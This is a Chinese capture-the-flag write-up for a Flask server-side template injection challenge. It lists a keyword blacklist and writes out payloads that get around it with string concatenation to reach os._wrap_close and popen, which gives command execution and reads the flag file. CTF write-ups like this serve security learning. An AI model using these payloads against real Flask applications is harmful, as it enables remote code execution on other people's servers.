[四叶草模板注入漏洞演习第三弹] flask真香

简单的ssti,但是ssti输出点很迷,导致花了十来分钟才找到。
进入题目看到一个3D矢量模型,但是并没有找到信息传入和输出的地方:
[四叶草模板注入漏洞演习第三弹] flask真香
然后思路卡在了这里,尝试了arjun和dirsearch均无果,然后发现题目的404页面是自己编写的:
[四叶草模板注入漏洞演习第三弹] flask真香
尝试了一下{{2*2}}便找到了ssti点:
[四叶草模板注入漏洞演习第三弹] flask真香
然后简单fuzz了一下,发现过滤的很多,存在违禁词时会返回500状态,过滤了:

class
subclasses
config
args
request
open
eval
import

我们可以找到session对象,并且利用其dict的类型来通过字典的键名(键名为字符串,可拼接)来寻找我们需要的类。
通过字符串拼接来绕过过滤,构造:{{session['cla'+'ss']}}
[四叶草模板注入漏洞演习第三弹] flask真香
然后不断拼接__bases__[0]来一层一层向上查找基类,直到找到object基类:{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]}}
[四叶草模板注入漏洞演习第三弹] flask真香
再利用__subclasses__去访问object基类下的所有子类:{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[:}}
[四叶草模板注入漏洞演习第三弹] flask真香
我们尝试寻找可以执行命令的子类,主要应该考虑os类,在页面中搜索后找到os._wrap_close类,定位其位置并使用__init__来将其实例化,再使用__globals__来查看所有变量:
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[237].__init__.__globals__}}
[四叶草模板注入漏洞演习第三弹] flask真香
并且我们也在该类下找到了可以用于执行命令的popen函数:
[四叶草模板注入漏洞演习第三弹] flask真香
但是popen也会被过滤,还是使用字符串拼接的方法绕过:
{{session['__cla'+'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0]['__subcla'+'sses__']()[237].__init__.__globals__['po'+'pen']('ls').read()}}
成功RCE:
[四叶草模板注入漏洞演习第三弹] flask真香
然后再执行cat Th1s__is_S3cret即可获得Flag

做完之后发现这道题是NCTF2018的一道原题,于是百度找到了一位大师傅的Wp:深入SSTI-从NCTF2018两道Flask看bypass新姿势
文章将ssti bypass的思路与原理分析的非常清晰,学到了很多操作,推荐一下

上一篇:open_spiel 随笔


下一篇:kmp(暴力匹配)